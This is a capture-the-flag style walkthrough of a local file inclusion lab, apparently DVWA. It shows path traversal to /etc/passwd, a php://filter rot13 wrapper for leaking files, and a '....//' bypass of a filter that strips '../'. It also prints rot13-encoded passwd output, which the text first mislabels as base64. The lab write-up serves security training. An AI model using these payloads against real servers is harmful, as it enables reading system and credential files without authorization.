### Objective

Read all five famous quotes from '[../hackable/flags/fi.php](http://localhost:5000/hackable/flags/fi.php)' using only the file inclusion.

Let's try the our easy payload first.
```txt
../../../../etc/passwd
```
No luck, maybe input is sanitized this time? Let's give the source code a read.

```php
`// Input validation  
$file = str_replace( array( "http://", "https://" ), "", $file );  
$file = str_replace( array( "../", "..\"" ), "", $file );`
```
Look's like ../ and ..\ is being replaced with a space. Let's check out other payloads.
Let's try single URL encoding.
```html
..%2Fhackable%2Fflags%2Ffi.php
```
No luck, double encoding?
```html
..%252Fhackable%252Fflags%252Ffi.php
```
Still no bueno.
Let's try the php:filter payload
```php
php://filter/read=string.rot13/resource=index.php
```
And we get a response in base64!
```txt
ebbg:k:0:0:ebbg:/ebbg:/ova/onfu qnrzba:k:1:1:qnrzba:/hfe/fova:/hfe/fova/abybtva ova:k:2:2:ova:/ova:/hfe/fova/abybtva flf:k:3:3:flf:/qri:/hfe/fova/abybtva flap:k:4:65534:flap:/ova:/ova/flap tnzrf:k:5:60:tnzrf:/hfe/tnzrf:/hfe/fova/abybtva zna:k:6:12:zna:/ine/pnpur/zna:/hfe/fova/abybtva yc:k:7:7:yc:/ine/fcbby/ycq:/hfe/fova/abybtva znvy:k:8:8:znvy:/ine/znvy:/hfe/fova/abybtva arjf:k:9:9:arjf:/ine/fcbby/arjf:/hfe/fova/abybtva hhpc:k:10:10:hhpc:/ine/fcbby/hhpc:/hfe/fova/abybtva cebkl:k:13:13:cebkl:/ova:/hfe/fova/abybtva jjj-qngn:k:33:33:jjj-qngn:/ine/jjj:/hfe/fova/abybtva onpxhc:k:34:34:onpxhc:/ine/onpxhcf:/hfe/fova/abybtva yvfg:k:38:38:Znvyvat Yvfg Znantre:/ine/yvfg:/hfe/fova/abybtva vep:k:39:39:vepq:/ine/eha/vepq:/hfe/fova/abybtva tangf:k:41:41:Tangf Oht-Ercbegvat Flfgrz (nqzva):/ine/yvo/tangf:/hfe/fova/abybtva abobql:k:65534:65534:abobql:/abarkvfgrag:/hfe/fova/abybtva _ncg:k:100:65534::/abarkvfgrag:/ova/snyfr zlfdy:k:101:101:ZlFDY Freire,,,:/abarkvfgrag:/ova/snyfr
```
and we get a response in ROT13! Let's try it with our objective.
```html
http://localhost:5000/vulnerabilities/fi/?page=php://filter/read=string.rot13/resource=....//....//hackable/flags/fi.php
```
```txt
1.) Bond. James Bond \n"; $line3 = "3.) Romeo, Romeo! Wherefore art thou Romeo?"; $line3 = "--LINE HIDDEN ;)--"; echo $line3 . "\n\n\n"; $line4 = "NC4pI" . "FRoZSBwb29s" . "IG9uIH" . "RoZSByb29mIG1" . "1c3QgaGF" . "2ZSBh" . "IGxlY" . "Wsu"; echo base64_decode( $line4 ); ?> 
```
the rest you can find in the source code.
Another way to do it, it only checks it once so we can probably just add another 2 spaces and slash.
```txt
http://localhost:5000/vulnerabilities/fi/?page=....//....//hackable/flags/fi.php
```
So the ../ will be changed leaving another ../
This is way easier and works too.


